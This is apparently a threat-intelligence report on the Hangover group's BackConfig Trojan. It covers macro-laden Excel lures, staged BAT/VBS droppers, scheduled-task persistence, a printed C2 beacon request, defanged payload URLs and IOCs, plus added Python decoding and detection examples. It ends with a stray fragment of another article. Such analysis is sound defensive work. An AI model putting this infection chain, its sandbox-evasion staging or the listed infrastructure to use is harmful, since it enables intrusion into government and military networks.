The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed. The modular nature certainly allows for quicker changes to individual components and, perhaps more importantly for the attackers, splits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems, especially when analyzing the components in isolation.

Our threat prevention platform with WildFire detects activity associated with this threat group, while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified.

Indicators of compromise related to this research are documented at the end of this report and in the Adversary Playbook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.

Starting Point

Unit 42 first saw activity involving the Windows PE executable file (SHA256: 84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data related to particular sectors and countries of interest.

The file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government department in one country and a military organization in another -- within minutes of each other. The source of the download was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as dphc.exe. More details on how the malware was delivered are described later in the blog.

The choice of terminology in URL paths and file names when delivering BackConfig malware, in this and the other campaigns discussed later, is clearly intended to blend in with benign operations, paths and filenames. Although spelled differently, it would be easy to believe the payload relates to the DHCP networking service.

The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system.

This sample has a custom "decryption" routine that subtracts six from each character. The following strings are decrypted using this method:

    • linkrequest[.]live
    • \\Adobe\\Driver\\dwg\\pid.txt
    • \\Adobe\\Driver\\dwg\\
    • \\Adobe\\Driver\\dwg\\wuaupdt.exe

The Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable will exit without performing any further activities. The pid.txt file is created during the earlier delivery and installation phases starting with the weaponized Excel document. More information about this setup process is covered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the individual executable payload component harder.

    • %USERPROFILE%\Adobe\Driver\dwg\pid.txt

The C2 channel uses HTTPS, as the INTERNET_FLAG_SECURE flag is set when calling the HttpOpenRequestA function. The beacon HTTP request looks like the following:

GET /orderme/[contents of pid.txt file] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW
Host: linkrequest[.]live [resolving to 23.106.123[.]87]

The Trojan will look for the following field and values within the HTTP response header:

    • "Content-Type: application"
    • "Content-Type: xDvsds"
    • "Content-Type: Bw11eW"

If the Content-Type field contains a value of application, the Trojan extracts a filename from the HTTP response headers, taken from between the string filename and Content-Transfer-Encoding. It uses this filename to create a file in the %USERPROFILE%\Adobe\Driver\dwg\ folder and writes the data from the HTTP response to it. Based on the other two Content-Types, we believe the filename provided will be either wuaupdt.exe or test.bat.

If the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:

%USERPROFILE%\Adobe\Driver\dwg\wuaupdt.exe

If the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:

%USERPROFILE%\Adobe\Driver\dwg\test.bat
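The string routine and the beacon/response logic described above are both small enough to re-implement for analysis and detection. The following is an added example, my own code rather than the malware’s: decode_string() is the subtract-six transform (the inputs are built by adding six to known plaintext), is_beacon() matches the GET /orderme/ request with the “ @/NEW” User-Agent trailer, and classify_response() maps the three Content-Type values to the action taken. The sample request and response are constructed, and the exact header layout around “filename” is an assumption.

```python
"""Recover BackConfig strings and model its beacon/response handling.

Added example for analysing the sample described above; it is not the
malware's own code. decode_string() is the subtract-six transform the post
describes. is_beacon() matches the GET /orderme/... request with the
" @/NEW" User-Agent trailer, and classify_response() maps the three
Content-Type values to the action taken. The sample request and response
below are constructed; the header layout around "filename" is an assumption.
"""
import re

DROP_DIR = r"%USERPROFILE%\Adobe\Driver\dwg"
BEACON_LINE_RE = re.compile(r"^GET /orderme/\S+ HTTP/1\.[01]$")
BEACON_UA_SUFFIX = " @/NEW"


def decode_string(blob):
    """Subtract six from every character, as the sample's routine does."""
    return "".join(chr(ord(c) - 6) for c in blob)


def encode_string(text):
    """Inverse transform; only used to build inputs for decode_string()."""
    return "".join(chr(ord(c) + 6) for c in text)


def parse_headers(raw):
    """Lower-cased header dict from a raw HTTP message; '_raw' keeps the header block."""
    head = raw.partition("\r\n\r\n")[0]
    headers = {"_raw": head}
    for line in head.split("\r\n")[1:]:          # skip the request/status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def is_beacon(raw_request):
    """True for a request shaped like the C2 beacon described above."""
    first_line = raw_request.split("\r\n", 1)[0]
    ua = parse_headers(raw_request).get("user-agent", "")
    return bool(BEACON_LINE_RE.match(first_line)) and ua.endswith(BEACON_UA_SUFFIX)


def classify_response(raw_response):
    """(action, path) the Trojan would take for this C2 response.

    action is 'write' (save the body under DROP_DIR), 'exec' (ShellExecute
    a file already in DROP_DIR) or 'none'.
    """
    h = parse_headers(raw_response)
    ctype = h.get("content-type", "")
    if ctype == "xDvsds":
        return ("exec", DROP_DIR + r"\wuaupdt.exe")
    if ctype == "Bw11eW":
        return ("exec", DROP_DIR + r"\test.bat")
    if "application" in ctype:
        # Filename is taken from between "filename" and "Content-Transfer-Encoding".
        m = re.search(r"filename(.*?)Content-Transfer-Encoding", h["_raw"], re.S)
        name = m.group(1).strip(' ="\r\n;') if m else None
        if not name:
            return ("write", None)
        return ("write", DROP_DIR + "\\" + name)
    return ("none", None)


# Constructed beacon; the path component stands in for the contents of pid.txt.
SAMPLE_BEACON = (
    "GET /orderme/PID_PLACEHOLDER HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) "
    "Gecko/20100101 Firefox/52.0 @/NEW\r\n"
    "Host: c2.example.invalid\r\n\r\n"
)

# Constructed C2 reply delivering a file (header layout is assumed).
SAMPLE_APP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application\r\n"
    'Content-Disposition: attachment; filename="wuaupdt.exe"\r\n'
    "Content-Transfer-Encoding: binary\r\n\r\n"
    "MZ...placeholder body..."
)

if __name__ == "__main__":
    print(decode_string(encode_string("linkrequest[.]live")))
    print(is_beacon(SAMPLE_BEACON))
    print(classify_response(SAMPLE_APP_RESPONSE))
```

For detection, the combination of a /orderme/ path and the non-standard “ @/NEW” trailer on an otherwise ordinary Firefox 52 User-Agent is the part worth keying on; the Host value will change with infrastructure.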

At the time of writing, the C2 appeared inoperative and no further payloads were seen. We believe that the resulting wuaupdt.exe file would provide further capabilities to steal information, log keystrokes, and run additional commands, either directly or via additional plugins that it would download, as documented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.

Unit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any non-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as mentioned here and here.

PE Metadata

The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.

Using this metadata, together with information gleaned from infrastructure investigation, Unit 42 was able to pivot on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the last 12 months are listed in Tables 1 and 2 below.

SHA256      Compilation Time (UTC)  First Seen (Pacific)   Signer Name
84e5629...  01/20/2020 7:26:09am    01/19/2020 11:49:03pm  Foxit Software Incorporated
18ce3ee...  10/10/2019 9:22:11am    01/16/2020 4:30:26pm
4a4bc01...  11/21/2019 9:19:49am    01/16/2020 1:31:46am   wind0ws
91c67c1...  11/21/2019 9:19:49am    12/02/2019 2:03:41am
de5b670...  11/21/2019 9:19:49am    11/21/2019 11:59:05pm
f79ebf0...  10/28/2019 5:35:26am    11/09/2019 10:32:09pm  NVIDIA Corporation
31faeef...  10/10/2019 9:22:11am    10/13/2019 10:11:04pm  Foxit Software Incorporated
d87b875...  09/12/2019 5:54:04am    09/26/2019 9:32:19am   Digicert Global
1510996...  12/05/2018 4:35:03am    04/09/2019 10:30:16am  Foxit Software Incorporated

Table 1. Describing PE compile times and Digital signatures used, ordered by first seen.

The compilation time stored in the executable (SHA256: 84e5629...) appears to be after the point at which the file was first seen by our WildFire analysis system. While the PE file timestamp could be modified post-compilation, the oddity is more likely explained by time zones: 23:49 Pacific time on the 19th is 13:49 in Bangladesh on the 20th, and 7:26am UTC falls between 11:26 and 13:26 across the South Asia region, which would make the sample’s compilation quite recent with respect to its delivery.

More details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at the end of this report.

The following table shows the version information from the same PE files, grouped by similar File Description fields. The order remains the same, except for the sample (SHA256: 18ce3ee...), which was first seen January 16th, 2020 but for some reason reverted to the exact version information seen in samples from two to three months prior, namely Link Finder.

SHA256      File Description   File Version  Product Name            Product Version  Copyright
84e5629...  Альберт (Albert)   06.10.2015    Альберт                 01.05.2015       Copyright @ 2015-2026 secosec
4a4bc01...  Ссылка (Link)      01.01.12      ссылка                  10.01.2015       Copyright @ 2011-2021 secosec Inc. Все права защищены (All rights reserved)
91c67c1...  (same as 4a4bc01...)
de5b670...  (same as 4a4bc01...)
18ce3ee...  Link Finder        01.01.12      Link Finder             13,9,1632        Copyright @2011-2020 Techtest Inc. All Rights Reserved
f79ebf0...  (same as 18ce3ee...)
31faeef...  (same as 18ce3ee...)
d87b875...  scrapper           01.12.001     scrapper                13,6,1662        Copyright @Scrapper Ltd Reserved
1510996...  system process     2,1,1,2015    system process cleaner  2,1,1,2015       Copyright © 2004-2018 Foxit Software Inc. All Rights Reserved

Table 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.

Of the set, the file (SHA256: 1510996...) has most consistency in terms of a theme, using the Foxit Copyright information, self-signed digital signature and even using the company logo, as shown in the Figure below, for the executable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a missing period symbol, implying it was copied rather than created.

The actors then moved to use seemingly fictitious company and product names while using a mixture of signer names in their digital signatures. No file icons were used at all over the last 11 months.

Recent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown and translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the BackConfig malware, or perhaps to make the content more relevant to specific targets within the victim organizations.

Delivery and Installation

In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached to phishing emails; phishing URL links in emails appear to be the Hangover group’s modus operandi.

The remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel documents, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig malware. Through infrastructure analysis, however, Unit 42 was able to find a BackConfig PE sample (SHA256: e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2 domain matissues[.]com and dropped by the weaponized Rich Text Format (RTF) file (SHA256: 752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the CVE-2017-11882 Equation Editor vulnerability in Office applications to execute the PE sample, a unique exploitation method compared to all other samples analyzed.

Compromised Third-Party Infrastructure

Continuing to pivot on data obtained from the samples found thus far, we discovered related URLs pointing to compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table lists some examples of compromised sites delivering weaponized XLS files with filenames such as Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and Circullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb), implying (even with the incorrect spelling) that the content is, or relates to, a letter or advertisement distributed to a large number of people.

SHA-256 | First Seen | Related URL | Description | Location
be3f12b... | 2019-10 | http://nsaimmigration[.]com/userfiles/image/fbr.php and nphp_registration_form.php (both HTTP 404) | Consultant and Legal Advice company supporting students to live and study abroad. | Pakistan
0aa5cf1... | 2018-09 | http://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php | Web design and dev site running outdated WordPress application | Pakistan
ed638b5... | 2017-11 | http://alphamike.com[.]mv/housing | Shipping agency for freight forwarding and cargo delivery. | Maldives
| | http://mgamphs.edu[.]bd/info/ (down) | Muhurigonj Academy of Music and Performance High School. Reference. | Bangladesh

Table 3. Compromised third-party infrastructure to support delivery of BackConfig.

Given the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr” in some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of Pakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const WelcomePage = "FBR".

The older compromised hosting examples in Table 3 above do not rely on PHP (Hypertext Preprocessor) server-side scripts to deliver the weaponized XLS files. Instead, the pages simply returned HTTP status 301 (Moved Permanently) to redirect the browser to the XLS, initiating the download. More recent examples make use of PHP, with URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP script to log every visitor to the page, recording in a file named “info.txt” the datetime stamp of the event, the client operating system, and the client IP address.

The locations of the compromised third-party infrastructure, or of the organizations legitimately using it, align with the targeting Unit 42 has seen. This could be pure coincidence, a sign that the threat actors intend to take advantage of weaknesses in the target country’s wider infrastructure, or a case of the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security solutions.

Palo Alto Networks’ WildFire sandbox analyzed sample ed638b5... on November 8th, 2017, and, as described in the table above, the sample was hosted on two compromised websites: a Bangladeshi school and a Maldivian shipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region alongside other known targets and, interestingly, swore in a new President about a week after Unit 42 analyzed the sample.

The EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd) downloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by BitDefender here. To date, Unit 42 has seen only six similar samples since the late-2017 timeframe of this sample, compared to many more before it, perhaps indicating a changeover of the custom payloads used by the Hangover group. Certainly, there are some overlapping Tactics, Techniques and Procedures (TTPs) between the older samples and the more recent BackConfig samples.

http://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe

Evolution of Delivery Payloads

Before moving on to describe the most recent samples and installation methods used by the Hangover actors, the timeline figure below provides a high-level view of the evolution in TTPs used.

Figure 2. Evolution of delivery payloads

Despite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has investigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking that the file is corrupt and thus nothing has -- or will -- load as intended. Other fictitious error message texts have been used in the past, often with poor spelling or grammar.

Figure 3. Example fake error message displayed to the victim.

Similarly, the version information metadata stored in all the Excel documents analyzed share the same Author and Last Modified By names: Testing.

The following subsections describe the campaigns and malware as highlighted by the three most recent milestones in the timeline figure above.

2019 Milestone: Multi-Component

Registration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461) listed in Table 3 above provides an example of the types of lures used by the threat actors.

Upon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top of white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing program run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens include government employees, and registration forms were due by October 15th, 2019 (extended through November 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to increase the chances of compromise.

Figure 4. Social engineering lure against Pakistan government in October 2019

As the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted at the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence in the campaign relationship between the two.

    1. AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019
    2. VirusTotal processed the nsaimmigration... URL on the same day
    3. A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was processed in VirusTotal on the same day, and is related to http://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the VBS code dropped by the XLS be3f12b....
    4. The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.

The VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years. Instead of directly storing encoded EXE files or running batch shell commands from the VBA code itself, it retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to be off-screen for most people. Once the font colour was changed, the “setup” batch code component seen in previous variants and the new Visual Basic Script (VBS) downloader component were revealed in columns AA and AB, respectively, as shown in Figure 5 below.

Figure 5. VBS downloader and BAT setup file revealed in the XLS sheet.

Macro VBA code in the XLS parses the content of the two columns line by line, writing the contents to their respective files on disk and executing them, following the same process flow as described below in Figure 6.

2019 Milestone: BITS and ZIPs

A more recent weaponized XLS file (SHA256: 021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on November 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a decimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be decompressed to a folder named driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report and listed in the appendix section. The other file, Winmgt.txt, is an adaptation of the VBS downloader also described in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version writes the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the “setup” BAT file.
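An analyst pulling the decimal-encoded blob out of a macro like the one described above needs to turn it back into bytes, confirm it really is a ZIP and list what it carries. The script below is an added example (not Unit 42's code and not the malware's): the delimiter is assumed to be any non-digit run, and the embedded archive is constructed in memory with harmless placeholder text files named as in the report so the whole thing runs offline.

```python
"""Decode a decimal-encoded ZIP of the kind embedded in the VBA macro and
list its members. Example code added here; the sample payload is constructed
in memory and the comma delimiter is an assumption about the encoding."""
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"      # local file header signature of a ZIP archive


def decode_decimal_bytes(encoded: str) -> bytes:
    """Turn a run of decimal byte values (e.g. "80,75,3,4") into raw bytes.
    Any non-digit run is treated as a separator, so "80 75 3 4" works too."""
    values = [int(tok) for tok in re.findall(r"\d+", encoded)]
    out_of_range = [v for v in values if v > 255]
    if out_of_range:
        raise ValueError(f"values out of byte range: {out_of_range[:3]}")
    return bytes(values)


def is_zip(blob: bytes) -> bool:
    """True when the decoded data starts with the ZIP local-header magic."""
    return blob[:4] == ZIP_MAGIC


def list_members(blob: bytes) -> dict:
    """Return {member name: content} for every file in an in-memory ZIP."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def analyse(encoded: str) -> dict:
    """Decode, check the magic and (if it is a ZIP) enumerate the members,
    without ever writing anything to disk or executing it."""
    blob = decode_decimal_bytes(encoded)
    result = {"size": len(blob), "is_zip": is_zip(blob), "members": []}
    if result["is_zip"]:
        result["members"] = sorted(list_members(blob))
    return result


def build_constructed_sample() -> str:
    """Constructed stand-in for the macro's embedded data: a tiny ZIP holding
    two harmless placeholder text files, named as in the report, encoded as
    comma-separated decimal byte values."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("driverkit/driverkit.bat", "REM placeholder setup batch\r\n")
        zf.writestr("driverkit/Winmgt.txt", "' placeholder downloader script\r\n")
    return ",".join(str(b) for b in buf.getvalue())


if __name__ == "__main__":
    print(analyse(build_constructed_sample()))
```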

2020 Milestone: Fine Tuning

The following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen, Invoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen 2020-01-15).

The infection process consists of multiple components, as just described. The “setup” batch (BAT) file coordinates much of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed it.

Figure 6. Execution flow of BackConfig malware

The numbered bullet list below describes Figure 6.

    1. Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content.
    2. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report.
    3. Audio.txt is renamed to Audio.bat and executed.
    4. Audio.bat cleans up any files and folders related to previous infections, and recreates the required environment, including creating the aforementioned pid.txt file and setting various folders and files to be hidden from a default Windows Explorer view. The content of pid.txt is the victim’s computer name concatenated with a hyphen followed by a random number, although I believe the code used would not work as intended.
    5. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.
    6. Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.
    7. When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of pid.txt (step 4.) and only continues if the file exists.

Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.
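The behaviour in steps 5 to 7 is something a defender can hunt for in process-creation telemetry: a batch file registering minute-interval scheduled tasks whose targets are scripts or executables under user-writable paths, several of them from one parent within moments of each other. The detection below is an added example, not Unit 42's code; the event records, host names and paths are constructed stand-ins, and the assumed schtasks default of a 1-minute modifier is marked in a comment.

```python
"""Flag scheduled-task creations matching the staged execution chain:
short minute-based repeat, script/EXE target under a user-writable path,
and a single parent registering several such tasks. Example detection code
added here; the telemetry records are constructed, not real logs."""
import re
from collections import defaultdict

SCHTASKS = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
SC_MINUTE = re.compile(r"/sc\s+minute\b", re.I)
MODIFIER = re.compile(r"/mo\s+(\d+)", re.I)
TASK_RUN = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)
# A drive-letter or %VAR% path ending in a script/EXE extension inside /tr.
PATH_IN_TARGET = re.compile(
    r'((?:[a-z]:\\|%\w+%\\)[^"]*?\.(?:vbs|bat|cmd|js|ps1|exe))\b', re.I)
USER_WRITABLE = re.compile(
    r"^(?:%(?:temp|appdata|localappdata|public|userprofile)%|c:\\users\\|c:\\programdata\\)",
    re.I)
SCRIPT_EXT = re.compile(r"\.(?:vbs|bat|cmd|js|ps1|exe)$", re.I)
MAX_INTERVAL_MIN = 30   # the report's tasks fired every 10 and 20 minutes

# Constructed telemetry (ts = minutes since midnight), not real logs.
SAMPLE_EVENTS = [
    {"ts": 600, "host": "WS01",
     "parent": r"cmd.exe /c C:\Users\alice\AppData\Roaming\Audio.bat",
     "cmdline": r'schtasks /create /sc minute /mo 10 /tn "dphc" '
                r'/tr "C:\Users\alice\AppData\Roaming\dphc.exe" /f'},
    {"ts": 600, "host": "WS01",
     "parent": r"cmd.exe /c C:\Users\alice\AppData\Roaming\Audio.bat",
     "cmdline": r'schtasks /create /sc minute /mo 20 /tn "Drive" '
                r'/tr "wscript.exe C:\Users\alice\AppData\Roaming\Drive.vbs" /f'},
    {"ts": 610, "host": "WS02", "parent": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'schtasks /create /sc daily /st 03:00 /tn "VendorUpdate" '
                r'/tr "C:\Program Files\Vendor\update.exe"'},
    {"ts": 615, "host": "WS02", "parent": r"C:\Program Files\Agent\svc.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn "AgentBeat" '
                r'/tr "C:\Program Files\Agent\beat.exe"'},
]


def parse_task(cmdline):
    """Return (interval_minutes, target_path) for a minute-scheduled
    'schtasks /create' command line, or None for anything else."""
    if not SCHTASKS.search(cmdline) or not SC_MINUTE.search(cmdline):
        return None
    tr = TASK_RUN.search(cmdline)
    if not tr:
        return None
    mo = MODIFIER.search(cmdline)
    interval = int(mo.group(1)) if mo else 1   # assumed default when /mo is absent
    target = (tr.group(1) or tr.group(2)).strip()
    m = PATH_IN_TARGET.search(target)          # e.g. 'wscript.exe C:\...\x.vbs'
    return interval, (m.group(1) if m else target)


def score_event(ev):
    """Return a finding when all three weak signals line up, else None."""
    parsed = parse_task(ev["cmdline"])
    if not parsed:
        return None
    interval, path = parsed
    reasons = []
    if interval <= MAX_INTERVAL_MIN:
        reasons.append(f"repeats every {interval} min")
    if USER_WRITABLE.match(path):
        reasons.append("target under user-writable path")
    if SCRIPT_EXT.search(path):
        reasons.append("target is a script or EXE")
    if len(reasons) < 3:
        return None
    return {"host": ev["host"], "parent": ev["parent"], "ts": ev["ts"],
            "path": path, "interval": interval, "reasons": reasons,
            "severity": "medium"}


def detect(events, window_min=10):
    """Score every event, then raise severity when one parent process on one
    host registered two or more such tasks inside the window."""
    findings = [f for f in map(score_event, events) if f]
    by_parent = defaultdict(list)
    for f in findings:
        by_parent[(f["host"], f["parent"])].append(f)
    for group in by_parent.values():
        group.sort(key=lambda f: f["ts"])
        if len(group) >= 2 and group[-1]["ts"] - group[0]["ts"] <= window_min:
            for f in group:
                f["severity"] = "high"
                f["reasons"].append("same parent registered several such tasks")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"], finding["path"], finding["reasons"])
```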

ATT&CK

The following table describes the TTPs associated with the multiple campaigns described in this report.

Tactic | Technique (MITRE ATT&CK ID)
Technical Information Gathering | Acquire OSINT data sets and information (T1247)
Technical Information Gathering | Conduct social engineering (T1249)
Adversary Opsec | Compromise 3rd party infrastructure to support delivery (T1312)
Build Capabilities | Create custom payloads (T1345)
Build Capabilities | Obtain/re-use payloads (T1346)
Stage Capabilities | Upload, install, and configure software/tools (T1362)
Initial Compromise | Spear Phishing Link (T1192)
Execution | User Execution (T1204)
Execution | Exploitation for Client Execution (T1203)
Execution, Persistence | Scheduled Task (T1053)
Defense Evasion | Code Signing (T1116)
Defense Evasion | Deobfuscate/Decode Files or Information (T1140)
Defense Evasion | Hidden Files and Directories (T1158)
Defense Evasion | Obfuscated Files or Information (T1027)
Defense Evasion, Execution | Scripting (T1064)
Defense Evasion, Persistence | BITS Jobs (T1197)
Command & Control | Commonly Used Port (T1043)
Command & Control | Standard Application Layer Protocol (T1071)
Command & Control | Standard Cryptographic Protocol (T1032)
Command & Control | Remote File Copy (T1105)

Conclusion

The Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and, according to Unit 42’s visibility, targeting government and military organisations in South Asia using spear-phishing emails containing letters or government forms to lure victims into browsing to compromised websites serving weaponized Excel documents that install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen the use of exploits to circumvent the need for the user to execute any part of the installation chain.

The evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing commands and deploying executables both with and without obfuscation.

The latest versions contain modular components, making it easier to update and re-use code in order to deploy campaigns rapidly with the highest chance of success. The way the latest samples execute also indicates the group’s focus on evading sandboxes and other automated analysis systems by breaking malicious activity into chunks that each seem relatively benign.

Protections:

Cortex XDR protects endpoints from all malware, exploits and fileless attacks associated with Hangover actors.
WildFire® cloud-based threat analysis service accurately identifies samples associated with these malware families.
Threat Prevention provides protection against the known client and server-side vulnerability exploits, malware, and command and control infrastructure used by these actors.
URL Filtering identifies all phishing and malware domains associated with these actors and proactively flags new infrastructure associated with these actors before it is weaponized.
Users of AutoFocus™ contextual threat intelligence service can view malware associated with these attacks using the following tags:

More information about the Hangover group and the BackConfig malware can be found in AutoFocus.

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise



VBS files

87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya Housing campaign)
952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)
a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)

EXE Payloads
b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)

Infrastructure

linkrequest[.]live (23.106.123[.]87)
matissues[.]com
unique.fontsupdate[.]com
185.203.119[.]184
212.114.52[.]148

Digital Signatures

The following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig PE executable samples over the past twelve months.

  • Foxit:

thumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01
issuer: CN=Foxit Software Incorporated
subject: CN=Foxit Software Incorporated
version: 3
algorithm: sha1WithRSAEncryption
serial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8
valid from: 1/1/2018
valid to: 1/1/2024

  • Wind0ws:

thumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0
issuer: CN=wind0ws
subject: CN=wind0ws
version: 3
algorithm: sha1WithRSAEncryption
serial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70
valid from: 1/1/2019
valid to: 1/1/2025

  • NVIDIA:

thumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3
issuer: CN=NVIDIA Corporation
subject: CN=NVIDIA Corporation
version: 3
algorithm: sha1WithRSAEncryption
serial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1
valid from: 1/1/2019
valid to: 1/1/2025

Appendix

The following VBS and BAT code was extracted from XLS sample (SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c).

  • VBS downloader component (SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)

[Drive.txt -> Drive.vbs CODE]

  • “Setup” BAT component

[Audio.txt -> Audio.bat CODE]

 

COVID-19 Themed Malware Within Cloud Environments

Executive Summary

